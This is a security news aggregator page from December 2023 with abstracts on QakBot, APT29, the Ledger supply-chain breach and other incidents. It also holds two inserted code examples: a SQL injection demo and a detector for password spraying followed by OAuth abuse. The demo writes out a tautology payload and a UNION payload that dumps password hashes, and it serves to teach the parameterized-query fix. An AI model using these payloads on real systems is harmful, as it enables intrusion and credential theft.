Unmasking the Dark Side of Low-Code/No-Code Applications Full Text

Abstract Low-code/no-code (LCNC) and robotic process automation (RPA) have gained immense popularity, but how secure are they? Is your security team paying enough attention in an era of rapid digital transformation, where business users are empowered to create applications swiftly using platforms like Microsoft PowerApps, UiPath, ServiceNow, Mendix, and OutSystems? The simple truth is often swept under the rug. While low-code/no-code (LCNC) apps and robotic process automations (RPA) drive efficiency and agility, their dark security side demands scrutiny. LCNC application security emerges as a relatively new frontier, and even seasoned security practitioners and security teams grapple with the dynamic nature and sheer volume of citizen-developed applications. The accelerated pace of LCNC development poses a unique challenge for security professionals, underscoring the need for dedicated efforts and solutions to effectively address the security nuances of low-code development environments. Dig

The Hacker News

December 18, 2023 – Education

Fortifying Cyber Defenses: A Proactive Approach to Ransomware Resilience Full Text

Abstract Investing in cutting-edge cybersecurity tools not only enhances defensive capabilities but also stimulates innovation and fosters public-private partnerships to strengthen the nation's cyber defenses.

Cyware

December 18, 2023 – Malware

QakBot Malware Resurfaces with New Tactics, Targeting the Hospitality Industry Full Text

Abstract A new wave of phishing messages distributing the QakBot malware has been observed, more than three months after a law enforcement effort saw its infrastructure dismantled by infiltrating its command-and-control (C2) network. Microsoft, which made the discovery, described it as a low-volume campaign that began on December 11, 2023, and targeted the hospitality industry. "Targets received a PDF from a user masquerading as an IRS employee," the tech giant said in a series of posts shared on X (formerly Twitter). "The PDF contained a URL that downloads a digitally signed Windows Installer (.msi). Executing the MSI led to Qakbot being invoked using export 'hvsi' execution of an embedded DLL." Microsoft said that the payload was generated the same day the campaign started and that it's configured with the previously unseen version 0x500. Zscaler ThreatLabz, in a post shared on X, described the resurfaced QakBot as a 64-bit binary that utilizes AES

The Hacker News

December 17, 2023 – Breach

MongoDB Suffers Security Breach, Exposing Customer Data Full Text

Abstract MongoDB on Saturday disclosed it's actively investigating a security incident that has led to unauthorized access to "certain" corporate systems, resulting in the exposure of customer account metadata and contact information. The American database software company said it first detected anomalous activity on December 13, 2023, and that it immediately activated its incident response efforts. It further noted that "this unauthorized access has been going on for some period of time before discovery," but emphasized it's not "aware of any exposure to the data that customers store in MongoDB Atlas." It did not disclose the exact time period of the compromise. In light of the breach, MongoDB recommends that all customers be on the lookout for social engineering and phishing attacks, enforce phishing-resistant multi-factor authentication (MFA), as well as rotate their MongoDB Atlas passwords. That's not all. The company said it's also expe

The Hacker News

December 16, 2023 – Outage

Central Bank of Lesotho Facing Outages After Cyberattack Full Text

Abstract The ongoing downtime of the National Payments System has made it impossible for local banks in Lesotho to honor inter-bank transactions, requiring alternative measures to facilitate payments.

Cyware

December 16, 2023 – Outage

Ontario Public Library Shuts Down Most Services Due to Cyberattack Full Text

Abstract The attack on the library, along with recent ransomware incidents at other major libraries, underscores the need for improved cybersecurity measures and data protection in the library sector.

Cyware

December 16, 2023 – Government

China’s MIIT Introduces Color-Coded Action Plan for Data Security Incidents Full Text

Abstract China's Ministry of Industry and Information Technology (MIIT) on Friday unveiled draft proposals detailing its plans to tackle data security events in the country using a color-coded system. The effort is designed to "improve the comprehensive response capacity for data security incidents, to ensure timely and effective control, mitigation and elimination of hazards and losses caused by data security incidents, to protect the lawful rights and interests of individuals and organizations, and to safeguard national security and public interests," the department said. The 25-page document encompasses all incidents in which data has been illegally accessed, leaked, destroyed, or tampered with, categorizing them into four hierarchical tiers based on the scope and the degree of harm caused - Red: Level I ("especially significant"), which applies to widespread shutdowns, substantial loss of business processing capability, interruptions arising due to serious anomalie

The Hacker News

December 16, 2023 – Phishing

PikaBot Distributed via Malicious Search Ads Full Text

Abstract Threat actors are bypassing Google's security measures and using fingerprinting techniques to ensure successful execution of malicious downloads, pointing to a potential "malvertising as a service" model.

Cyware

December 16, 2023 – Hacker

Microsoft Warns of Storm-0539: The Rising Threat Behind Holiday Gift Card Frauds Full Text

Abstract Microsoft is warning of an uptick in malicious activity from an emerging threat cluster it's tracking as Storm-0539 for orchestrating gift card fraud and theft via highly sophisticated email and SMS phishing attacks against retail entities during the holiday shopping season. The goal of the attacks is to propagate booby-trapped links that direct victims to adversary-in-the-middle (AiTM) phishing pages that are capable of harvesting their credentials and session tokens. "After gaining access to an initial session and token, Storm-0539 registers their own device for subsequent secondary authentication prompts, bypassing MFA protections and persisting in the environment using the fully compromised identity," the tech giant said in a series of posts on X (formerly Twitter). The foothold obtained in this manner further acts as a conduit for escalating privileges, moving laterally across the network, and accessing cloud resources in order to grab sensitive information,

The Hacker News

December 15, 2023 – Criminals

Researchers Detect Undocumented 8220 Gang Activities Full Text

Abstract The 8220 gang, a Chinese-origin threat actor, continues to target Windows and Linux web servers with cryptojacking malware using evolving tactics and known vulnerabilities.

Cyware

December 15, 2023 – Botnet

New KV-Botnet Targeting Cisco, DrayTek, and Fortinet Devices for Stealthy Attacks Full Text

Abstract A new botnet consisting of firewalls and routers from Cisco, DrayTek, Fortinet, and NETGEAR is being used as a covert data transfer network for advanced persistent threat actors, including the China-linked threat actor called Volt Typhoon. Dubbed KV-botnet by the Black Lotus Labs team at Lumen Technologies, the malicious network is an amalgamation of two complementary activity clusters that have been active since at least February 2022. "The campaign infects devices at the edge of networks, a segment that has emerged as a soft spot in the defensive array of many enterprises, compounded by the shift to remote work in recent years," the company said. The two clusters – codenamed KY and JDY – are said to be distinct yet working in tandem to facilitate access to high-profile victims as well as establish covert infrastructure. Telemetry data suggests that the botnet is commandeered from IP addresses based in China. While the bots that are part of JDY engage in broader scanning

The Hacker News

December 15, 2023 – Criminals

ALPHV Ransomware Gang Returns, Sorta Full Text

Abstract The ALPHV ransomware gang is facing technical difficulties, with their leak site showing only one victim and negotiation links not working, potentially leaving them without payment.

Cyware

December 15, 2023 – Breach

Crypto Hardware Wallet Ledger’s Supply Chain Breach Results in $600,000 Theft Full Text

Abstract Crypto hardware wallet maker Ledger published a new version of its "@ledgerhq/connect-kit" npm module after unidentified threat actors pushed malicious code that led to the theft of more than $600,000 in virtual assets. The compromise was the result of a former employee falling victim to a phishing attack, the company said in a statement. This allowed the attackers to gain access to Ledger's npm account and upload three malicious versions of the module – 1.1.5, 1.1.6, and 1.1.7 – and propagate crypto drainer malware to other applications that are dependent on the module, resulting in a software supply chain breach. "The malicious code used a rogue WalletConnect project to reroute funds to a hacker wallet," Ledger said. Connect Kit, as the name implies, makes it possible to connect DApps (short for decentralized applications) to Ledger's hardware wallets. According to security firm Sonatype, version 1.1.7 directly embedded a wallet-draining pa

The Hacker News

December 15, 2023 – Breach

Data of Over a Million Users of the Crypto Exchange GokuMarket Exposed Full Text

Abstract The centralized crypto exchange GokuMarket, owned by ByteX, left an open instance, exposing sensitive user data, including IP addresses, email addresses, encrypted passwords, and crypto wallet addresses.

Cyware

December 15, 2023 – General

Bug or Feature? Hidden Web Application Vulnerabilities Uncovered Full Text

Abstract Web Application Security consists of a myriad of security controls that ensure that a web application: functions as expected; cannot be exploited to operate out of bounds; and cannot initiate operations that it is not supposed to do. Web Applications have become ubiquitous after the expansion of Web 2.0, with Social Media Platforms, E-Commerce websites, and email clients saturating the internet spaces in recent years. As the applications consume and store even more sensitive and comprehensive data, they become an ever more appealing target for attackers. Common Attack Methods: The three most common vulnerabilities that exist in this space are Injections (SQL, Remote Code), Cryptographic Failures (previously sensitive data exposure), and Broken Access Control (BAC). Today, we will focus on Injections and Broken Access Control. Injections: SQL is the most common Database software that is used, and hosts a plethora of payment data, PII data, and internal business records. A SQ

The Hacker News

December 15, 2023 – Criminals

BianLian, White Rabbit, and Mario Ransomware Gangs Spotted in a Joint Extortion Campaign Full Text

Abstract The ransomware gangs utilized a "password spraying" attack and compromised email accounts through Business Email Compromise (BEC) to anonymously deliver ransom payment demands and complicate investigations.

Cyware

December 15, 2023 – Vulnerabilities

New Security Vulnerabilities Uncovered in pfSense Firewall Software - Patch Now Full Text

Abstract Multiple security vulnerabilities have been discovered in the open-source Netgate pfSense firewall solution called pfSense that could be chained by an attacker to execute arbitrary commands on susceptible appliances. The issues relate to two reflected cross-site scripting (XSS) bugs and one command injection flaw, according to new findings from Sonar. "Security inside a local network is often more lax as network administrators trust their firewalls to protect them from remote attacks," security researcher Oskar Zeino-Mahmalat said. "Potential attackers could have used the discovered vulnerabilities to spy on traffic or attack services inside the local network." Impacting pfSense CE 2.7.0 and below and pfSense Plus 23.05.1 and below, the shortcomings could be weaponized by tricking an authenticated pfSense user (i.e., an admin user) into clicking on a specially crafted URL, which contains an XSS payload that activates command injection. A brief description

The Hacker News

December 15, 2023 – Attack

Kraft Heinz Reviewing Claims of Cyberattack but Internal Systems ‘Operating Normally’ Full Text

Abstract Kraft Heinz is investigating claims of a data breach by the Snatch ransomware gang, but currently sees no evidence of a broader attack or adverse effects on its internal systems.

Cyware

December 15, 2023 – Privacy

Google’s New Tracking Protection in Chrome Blocks Third-Party Cookies Full Text

Abstract Google on Thursday announced that it will start testing a new feature called "Tracking Protection" starting January 4, 2024, to 1% of Chrome users as part of its efforts to deprecate third-party cookies in the web browser. The setting is designed to limit "cross-site tracking by restricting website access to third-party cookies by default," Anthony Chavez, vice president of Privacy Sandbox at Google, said. The tech giant noted that participants for Tracking Protection will be selected at random and that chosen users will be notified upon opening Chrome on either a desktop or an Android device. The goal is to restrict third-party cookies (also called "non-essential cookies") by default, preventing them from being used to track users as they move from one website to the other for serving personalized ads. While several major browsers like Apple Safari and Mozilla Firefox have either already placed restrictions on third-party cookies via features l

The Hacker News

December 15, 2023 – Malware

New NKAbuse Malware Exploits NKN Blockchain Tech for DDoS Attacks Full Text

Abstract A novel multi-platform threat called NKAbuse has been discovered using a decentralized, peer-to-peer network connectivity protocol known as NKN (short for New Kind of Network) as a communications channel. "The malware utilizes NKN technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities," Russian cybersecurity company Kaspersky said in a Thursday report. NKN, which has over 62,000 nodes, is described as a "software overlay network built on top of today's Internet that enables users to share unused bandwidth and earn token rewards." It incorporates a blockchain layer on top of the existing TCP/IP stack. While threat actors are known to take advantage of emerging communication protocols for command-and-control (C2) purposes and evade detection, NKAbuse leverages blockchain technology to conduct distributed denial-of-service (DDoS) attacks and function as an implant inside com

The Hacker News

December 14, 2023 – General

Saudi Cyber Students Team with Bahrain to Assess AI Security & Risk Full Text

Abstract Saudi Arabian students specializing in AI and cybersecurity are participating in workshops to enhance their capabilities in identifying and assessing potential risks of large language models (LLMs) across different platforms.

Cyware

December 14, 2023 – Malware

116 Malware Packages Found on PyPI Repository Infecting Windows and Linux Systems Full Text

Abstract Cybersecurity researchers have identified a set of 116 malicious packages on the Python Package Index (PyPI) repository that are designed to infect Windows and Linux systems with a custom backdoor. "In some cases, the final payload is a variant of the infamous W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene Holt said in a report published earlier this week. The packages are estimated to have been downloaded over 10,000 times since May 2023. The threat actors behind the activity have been observed using three techniques to bundle malicious code into Python packages, namely via a test.py script, embedding PowerShell in setup.py file, and incorporating it in obfuscated form in the __init__.py file. Irrespective of the method used, the end goal of the campaign is to compromise the targeted host with malware, primarily a backdoor capable of remote command execution, data exfiltration, an

The Hacker News

December 14, 2023 – Attack

Sony Investigating Potential Ransomware Attack on Insomniac Games Unit Full Text

Abstract Sony's subsidiary, Insomniac Games, is currently investigating a reported ransomware attack by the Rhysida gang, which has targeted various government institutions and healthcare organizations in the past.

Cyware

December 14, 2023 – Malware

New Pierogi++ Malware by Gaza Cyber Gang Targeting Palestinian Entities Full Text

Abstract A pro-Hamas threat actor known as Gaza Cyber Gang is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi. The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it's implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor. "Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war," security researcher Aleksandar Milenkoski said in a report shared with The Hacker News. Gaza Cyber Gang, believed to be active since at least 2012, has a history of striking targets throughout the Middle East, particularly Israel and Palestine, often leveraging spear-phishing as a method of initial access. Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpSt

The Hacker News

December 14, 2023 – Solution

ThreatNG Open-Source Datasets Aim to Improve Cybersecurity Practices Full Text

Abstract The ThreatNG Governance and Compliance Dataset is an open-source initiative that aims to provide access to critical cybersecurity data, promoting transparency and collaboration.

Cyware

December 14, 2023 – APT

Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders Full Text

Abstract The Iranian state-sponsored threat actor known as OilRig deployed three different malware downloaders throughout 2022 to maintain persistent access to victim organizations located in Israel. The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader dubbed SampleCheck5000 (or SC5k). "These lightweight downloaders [...] are notable for using one of several legitimate cloud service APIs for [command-and-control] communication and data exfiltration: the Microsoft Graph OneDrive or Outlook APIs, and the Microsoft Office Exchange Web Services (EWS) API," security researchers Zuzana Hromcová and Adam Burgher said in a report shared with The Hacker News. By using well-known cloud service providers for command-and-control communication, the goal is to blend with authentic network traffic and cover up the group's attack infrastructure

The Hacker News

December 14, 2023 – Attack

District Court in Switzerland ‘Victim of a Cyber Attack’ Full Text

Abstract This incident follows a similar ransomware attack on the municipal administration of Zollikofen in November, highlighting the growing threat of ransomware attacks targeting Swiss organizations.

Cyware

December 14, 2023 – Education

Reimagining Network Pentesting With Automation Full Text

Abstract Network penetration testing plays a crucial role in protecting businesses in the ever-evolving world of cybersecurity. Yet, business leaders and IT pros have misconceptions about this process, which impacts their security posture and decision-making. This blog acts as a quick guide on network penetration testing, explaining what it is, debunking common myths and reimagining its role in today's security landscape. What is network penetration testing? Network penetration testing is a proactive approach to cybersecurity in which security experts simulate cyberattacks to identify gaps in an organization's cyberdefense. The key objective of this process is to identify and rectify weaknesses before hackers can exploit them. This process is sometimes called "pentesting" or "ethical hacking." Network pentesting checks for chinks in an organization's armor to help mitigate cyber-risks and protect against data, financial and reputational losses. Differe

The Hacker News

December 14, 2023 – Business

Check Point Software in SEC Settlement Talks in Connection With SolarWinds Probe Full Text

Abstract Check Point Software Technologies has cooperated with the SEC inquiry into the SolarWinds Orion cyber vulnerability, voluntarily providing documents and information about its limited testing environment access.

Cyware

December 14, 2023 – APT

Russian SVR-Linked APT29 Targets JetBrains TeamCity Servers in Ongoing Attacks Full Text

Abstract Threat actors affiliated with the Russian Foreign Intelligence Service (SVR) have targeted unpatched JetBrains TeamCity servers in widespread attacks since September 2023. The activity has been tied to a nation-state group known as APT29, which is also tracked as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. It's notable for the supply chain attack targeting SolarWinds and its customers in 2020. "The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments," cybersecurity agencies from Poland, the U.K., and the U.S. said. The vulnerability in question is CVE-2023-42793 (CVSS score: 9.8), a critical security flaw that could be weaponized by unauthenticated attackers to achieve remote code execution on affec

The Hacker News

December 14, 2023 – APT

China-Linked APT Volt Typhoon Linked to KV-Botnet Attacks Full Text

Abstract Volt Typhoon utilizes living-off-the-land techniques and hands-on-keyboard activity to evade detection, routing malicious traffic through compromised SOHO network devices and relying on customized versions of open-source tools for communication.

Cyware

December 14, 2023 – Attack

New Hacker Group ‘GambleForce’ Targeting APAC Firms Using SQL Injection Attacks Full Text

Abstract A previously unknown hacker outfit called GambleForce has been attributed to a series of SQL injection attacks against companies primarily in the Asia-Pacific (APAC) region since at least September 2023. "GambleForce uses a set of basic yet very effective techniques, including SQL injections and the exploitation of vulnerable website content management systems (CMS) to steal sensitive information, such as user credentials," Singapore-headquartered Group-IB said in a report shared with The Hacker News. The group is estimated to have targeted 24 organizations in the gambling, government, retail, and travel sectors across Australia, Brazil, China, India, Indonesia, the Philippines, South Korea, and Thailand. Six of these attacks were successful. The modus operandi of GambleForce is its exclusive reliance on open-source tools like dirsearch, sqlmap, tinyproxy, and redis-rogue-getshell at different stages of the attacks with the ultimate goal of exfiltrating sensitive inf

The Hacker News
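The GambleForce item above turns on "basic yet very effective" SQL injection and credential theft, which is exactly what a tool like sqlmap automates. The added example below is not Group-IB's material or any victim's code: it is a Python login query against an in-memory SQLite table with constructed rows, shown in the string-concatenated form that injection tools probe for and then in the parameter-bound form that defeats them. The payload strings and the column names are assumptions for the demonstration.

```python
"""SQL injection: the vulnerable query beside its parameterized fix (SQLite in memory)."""
import sqlite3


def make_db():
    """Constructed table: two users with placeholder password hashes."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "h1"), ("bob", "h2")])
    return con


def login_vulnerable(con, username, password_hash):
    """String concatenation: attacker-controlled text becomes SQL syntax."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password_hash = '{password_hash}'")
    return [row[0] for row in con.execute(sql)]


def login_safe(con, username, password_hash):
    """Bound parameters: the driver passes values separately from the query text,
    so quotes, OR and UNION in the input are just characters in a comparison."""
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return [row[0] for row in con.execute(sql, (username, password_hash))]


def demo():
    """Run both versions against the same payloads; returns the rows each one leaks."""
    con = make_db()
    tautology = "' OR '1'='1"                              # constructed payloads
    union = "' UNION SELECT password_hash FROM users --"   # '--' comments out the rest
    return {
        "vuln_legit": login_vulnerable(con, "alice", "h1"),
        "vuln_tautology": login_vulnerable(con, tautology, tautology),   # every user
        "vuln_union": login_vulnerable(con, union, "x"),                  # hash column dumped
        "safe_tautology": login_safe(con, tautology, tautology),          # nothing
        "safe_union": login_safe(con, union, "x"),                        # nothing
        "safe_legit": login_safe(con, "alice", "h1"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:15} -> {rows}")
```

The UNION case is the one that matters for credential theft: with the vulnerable query the attacker chooses which column comes back, so the result set that was supposed to hold a username carries the password hashes instead. The bound-parameter version returns nothing for both payloads without any input filtering.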

December 14, 2023 – Attack

Red Roof Hotels Claims Cybersecurity Incident Did Not Involve Guest Data Full Text

Abstract Hotel company Red Roof experienced a ransomware attack in September, but fortunately, no guest data was compromised. The attack was detected when suspicious activity was noticed, leading to the discovery of ransomware.

Cyware

December 13, 2023 – Business

Zero Networks Raises $20 Million Series B to Prevent Attackers From Spreading in Corporate Networks Full Text

Abstract The funding round was led by U.S. Venture Partners (USVP), and included strategic investor Dmitri Alperovitch, co-founder and former CTO of CrowdStrike, as well as existing investors Venrock, CyberArk, F2 Capital, and Pico Venture Partners.

Cyware

December 13, 2023 – Phishing

BazaCall Phishing Scammers Now Leveraging Google Forms for Deception Full Text

Abstract The threat actors behind the BazaCall call back phishing attacks have been observed leveraging Google Forms to lend the scheme a veneer of credibility. The method is an "attempt to elevate the perceived authenticity of the initial malicious emails," cybersecurity firm Abnormal Security said in a report published today. BazaCall (aka BazarCall), which was first observed in 2020, refers to a series of phishing attacks in which email messages impersonating legitimate subscription notices are sent to targets, urging them to contact a support desk to dispute or cancel the plan, or risk getting charged anywhere between $50 and $500. By inducing a false sense of urgency, the attacker convinces the target over a phone call to grant them remote access capabilities using remote desktop software and ultimately establish persistence on the host under the guise of offering help to cancel the supposed subscription. Some of the popular services that are impersonated include Netfl

The Hacker News

December 13, 2023 – Criminals

New Underground Market Comes Online Just in Time for the Holidays Full Text

Abstract The OLVX marketplace operates on the clear web and has gained popularity in recent months. It offers various products and services, including phish kits, remote desktop connections, cPanel credentials, webshells, and stolen data.

Cyware

December 13, 2023 – Solution

Google Using Clang Sanitizers to Protect Android Against Cellular Baseband Vulnerabilities Full Text

Abstract Google is highlighting the role played by Clang sanitizers in hardening the security of the cellular baseband in the Android operating system and preventing specific kinds of vulnerabilities. This comprises Integer Overflow Sanitizer (IntSan) and BoundsSanitizer (BoundSan), both of which are part of UndefinedBehaviorSanitizer (UBSan), a tool designed to catch various kinds of undefined behavior during program execution. "They are architecture agnostic, suitable for bare-metal deployment, and should be enabled in existing C/C++ code bases to mitigate unknown vulnerabilities," Ivan Lozano and Roger Piqueras Jover said in a Tuesday post. The development comes months after the tech giant said it's working with ecosystem partners to increase the security of firmware that interacts with Android, thereby making it difficult for threat actors to achieve remote code execution within the Wi-Fi SoC or the cellular baseband. IntSan and BoundSan are two of the compi

The Hacker News

December 13, 2023 – Breach

Update: Ransomware Group Publishes Stolen Medical Data Full Text

Abstract The effects of a November ransomware attack against Oceanside, California’s Tri-City Medical Center were contained more than two weeks ago, but now those behind the cyber incident are publishing stolen data on the dark web.

Cyware

December 13, 2023 – Solution

How to Analyze Malware’s Network Traffic in A Sandbox Full Text

Abstract Malware analysis encompasses a broad range of activities, including examining the malware's network traffic. To be effective at it, it's crucial to understand the common challenges and how to overcome them. Here are three prevalent issues you may encounter and the tools you'll need to address them. Decrypting HTTPS traffic: Hypertext Transfer Protocol Secure (HTTPS), the protocol for secure online communication, has become a tool for malware to conceal its malicious activities. By cloaking data exchange between infected devices and command-and-control (C&C) servers, malware can operate undetected, exfiltrating sensitive data, installing additional payloads, and receiving instructions from the operators. Yet, with the right tool, decrypting HTTPS traffic is an easy task. For this purpose, we can use a man-in-the-middle (MITM) proxy. The MITM proxy works as an intermediary between the client and the server, intercepting their communication. The MITM proxy aids analy

The Hacker News

December 13, 2023 – Vulnerabilities

Sophos Backports Fix for CVE-2022-3236 for EOL Firewall Firmware Full Text

Abstract Sophos has backported the patch for CVE-2022-3236 to end-of-life (EOL) firewall firmware versions due to ongoing attacks exploiting the vulnerability. The code injection vulnerability is being actively exploited by threat actors to target South Asia.

Cyware

December 13, 2023 – Cryptocurrency

Microsoft Warns of Hackers Exploiting OAuth for Cryptocurrency Mining and Phishing Full Text

Abstract Microsoft has warned that adversaries are using OAuth applications as an automation tool to deploy virtual machines (VMs) for cryptocurrency mining and launch phishing attacks. "Threat actors compromise user accounts to create, modify, and grant high privileges to OAuth applications that they can misuse to hide malicious activity," the Microsoft Threat Intelligence team said in an analysis. "The misuse of OAuth also enables threat actors to maintain access to applications even if they lose access to the initially compromised account." OAuth, short for Open Authorization, is an authorization and delegation framework (as opposed to authentication) that provides applications the ability to securely access information from other websites without handing over passwords. In the attacks detailed by Microsoft, threat actors have been observed launching phishing or password-spraying attacks against poorly secured accounts with permissions to create or modify OAuth

The Hacker News
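The chain Microsoft describes above (a password-sprayed account that then creates an OAuth application and grants it high privileges) is detectable because the steps sit close together in the audit trail and share an actor. The correlation below is an added example written for this page, not Microsoft's detection logic or log schema: the event names, field names, permission strings and thresholds are assumptions, and the audit events are constructed.

```python
"""Correlate password spraying with follow-on high-privilege OAuth app grants."""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed permission names and thresholds (tune for the real tenant and schema).
HIGH_PRIV = {"Directory.ReadWrite.All", "Application.ReadWrite.All",
             "RoleManagement.ReadWrite.Directory"}
SPRAY_MIN_ACCOUNTS = 3                  # distinct accounts failing from one source IP
SPRAY_WINDOW = timedelta(minutes=30)
FOLLOW_ON_WINDOW = timedelta(hours=24)  # sign-in to grant, for the "high" verdict
NEW_APP_WINDOW = timedelta(hours=1)     # app creation to grant, for the "medium" verdict


def _t(s):
    return datetime.fromisoformat(s)


# Constructed audit events, oldest first (not real tenant data; field names assumed).
EVENTS = [
    {"ts": "2023-12-01T09:00:00", "ip": "203.0.113.7", "actor": "a.lee", "event": "SignInFailed"},
    {"ts": "2023-12-01T09:00:05", "ip": "203.0.113.7", "actor": "b.kim", "event": "SignInFailed"},
    {"ts": "2023-12-01T09:00:09", "ip": "203.0.113.7", "actor": "c.ruiz", "event": "SignInFailed"},
    {"ts": "2023-12-01T09:00:14", "ip": "203.0.113.7", "actor": "j.doe", "event": "SignInFailed"},
    {"ts": "2023-12-01T09:01:10", "ip": "203.0.113.7", "actor": "j.doe", "event": "SignInSuccess"},
    {"ts": "2023-12-01T09:05:00", "ip": "203.0.113.7", "actor": "j.doe", "event": "AddApplication",
     "app": "backup-sync"},
    {"ts": "2023-12-01T09:06:00", "ip": "203.0.113.7", "actor": "j.doe", "event": "GrantAppPermission",
     "app": "backup-sync", "permission": "Directory.ReadWrite.All"},
    {"ts": "2023-12-01T09:07:00", "ip": "203.0.113.7", "actor": "j.doe", "event": "GrantAppPermission",
     "app": "backup-sync", "permission": "Mail.Send"},
    {"ts": "2023-12-01T11:00:00", "ip": "198.51.100.2", "actor": "svc-ops", "event": "GrantAppPermission",
     "app": "hr-reports", "permission": "Directory.ReadWrite.All"},
    {"ts": "2023-12-01T11:30:00", "ip": "198.51.100.9", "actor": "m.chen", "event": "SignInSuccess"},
    {"ts": "2023-12-01T11:31:00", "ip": "198.51.100.9", "actor": "m.chen", "event": "GrantAppPermission",
     "app": "intranet", "permission": "User.Read"},
]


def spray_sources(events):
    """{ip: accounts} for IPs whose failed sign-ins hit SPRAY_MIN_ACCOUNTS distinct
    accounts inside SPRAY_WINDOW (one password tried across many users)."""
    fails = defaultdict(list)
    for e in events:
        if e["event"] == "SignInFailed":
            fails[e["ip"]].append((_t(e["ts"]), e["actor"]))
    sprays = {}
    for ip, items in fails.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            accts = {a for t, a in items[i:] if t - t0 <= SPRAY_WINDOW}
            if len(accts) >= SPRAY_MIN_ACCOUNTS:
                sprays[ip] = accts
                break
    return sprays


def compromised_sessions(events, sprays):
    """(actor, time) for successful sign-ins coming from a spraying IP."""
    return [(e["actor"], _t(e["ts"])) for e in events
            if e["event"] == "SignInSuccess" and e["ip"] in sprays]


def detect_oauth_abuse(events):
    """Alert on every high-privilege grant to an OAuth app; severity rises when the
    granting account signed in from a spray source, or when the app is brand new."""
    sprays = spray_sources(events)
    sessions = compromised_sessions(events, sprays)
    created = {e["app"]: _t(e["ts"]) for e in events if e["event"] == "AddApplication"}
    alerts = []
    for e in events:
        if e["event"] != "GrantAppPermission" or e["permission"] not in HIGH_PRIV:
            continue
        t = _t(e["ts"])
        from_sprayed = any(a == e["actor"] and timedelta(0) <= t - st <= FOLLOW_ON_WINDOW
                           for a, st in sessions)
        new_app = e["app"] in created and t - created[e["app"]] <= NEW_APP_WINDOW
        severity = "high" if from_sprayed else ("medium" if new_app else "low")
        alerts.append({"actor": e["actor"], "app": e["app"],
                       "permission": e["permission"], "severity": severity})
    return alerts


if __name__ == "__main__":
    for alert in detect_oauth_abuse(EVENTS):
        print(alert)
```

Even the "low" alert is worth a ticket: a high-privilege grant to an app is rare enough that reviewing every one is cheap, and the report's point that the app outlives the compromised account means the grant, not the sign-in, is the thing to revoke.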

December 13, 2023 – Government

FCC Reminds Mobile Phone Carriers They Must do More to Prevent SIM Swaps Full Text

Abstract The FCC has updated its rules to require carriers to better verify customers' identities before making any changes to their accounts. The agency also emphasized the importance of quickly notifying customers of any account changes.

Cyware

December 13, 2023 – Outage

Major Cyber Attack Paralyzes Kyivstar - Ukraine’s Largest Telecom Operator Full Text

Abstract Ukraine's biggest telecom operator Kyivstar has become the victim of a "powerful hacker attack," disrupting customer access to mobile and internet services. "The cyberattack on Ukraine's #Kyivstar telecoms operator has impacted all regions of the country with high impact to the capital, metrics show, with knock-on impacts reported to air raid alert network and banking sector as work continues to restore connectivity," NetBlocks said in a series of posts on X (formerly Twitter). Kyivstar, which is owned by Dutch-domiciled multinational telecommunication services company VEON, serves nearly 25 million mobile subscribers and more than 1 million home internet customers. The company said the attack was "a result of" the war with Russia and that it has notified law enforcement and special state services. While Kyivstar is working to restore the services, the internet watchdog noted that the telco is largely offline. That said, Kyivstar has yet t

The Hacker News

December 13, 2023 – Malware

Cluster of Malicious Python Packages in PyPI Discovered Distributing Malware Full Text

Abstract ESET Research has discovered a cluster of malicious Python packages in PyPI, the official Python package repository. These packages target both Windows and Linux systems and deliver a custom backdoor.

Cyware

December 13, 2023 – Privacy

Congress Finds Pharmacies Give Patient Records to Law Enforcement Without Warrants Full Text

Abstract A congressional review found that major pharmacy chains do not require a warrant before sharing customers' records with law enforcement, raising concerns about the privacy of Americans' pharmaceutical information.

Cyware

December 13, 2023 – Breach

DonorView Exposes One Million Records for Unknown Time Frame Full Text

Abstract The exposed information included donor names, addresses, payment methods, and even sensitive data about children associated with the organizations, posing a potential risk for phishing attacks and fraudulent donation requests.

Cyware

December 13, 2023 – Breach

UK Ministry of Defence Fined $440K for Afghan Evacuation Data Breach Full Text

Abstract The UK's Ministry of Defence has been fined £350,000 ($440,000) by the ICO for failing to protect the personal information of Afghans who worked with the British government and sought relocation after the Taliban took control of Afghanistan.

Cyware

December 13, 2023 – Breach

Dubai’s Largest Taxi App DTC Exposes Data on Over 220,000 People Full Text

Abstract The leaked data included personal information such as email addresses, phone numbers, and bank details. It also included driver information such as driving license numbers and work permit numbers.

Cyware

December 13, 2023 – Vulnerabilities

Microsoft’s Final 2023 Patch Tuesday: 33 Flaws Fixed, Including 4 Critical Full Text

Abstract Microsoft released its final set of Patch Tuesday updates for 2023, closing out 33 flaws in its software, making it one of the lightest releases in recent years. Of the 33 shortcomings, four are rated Critical and 29 are rated Important in severity. The fixes are in addition to 18 flaws Microsoft addressed in its Chromium-based Edge browser since the release of Patch Tuesday updates for November 2023. According to data from the Zero Day Initiative, the software giant has patched more than 900 flaws this year, making it one of the busiest years for Microsoft patches. For comparison, Redmond resolved 917 CVEs in 2022. While none of the vulnerabilities are listed as publicly known or under active attack at the time of release, some of the notable ones are listed below: CVE-2023-35628 (CVSS score: 8.1) - Windows MSHTML Platform Remote Code Execution Vulnerability; CVE-2023-35630 (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability; CVE

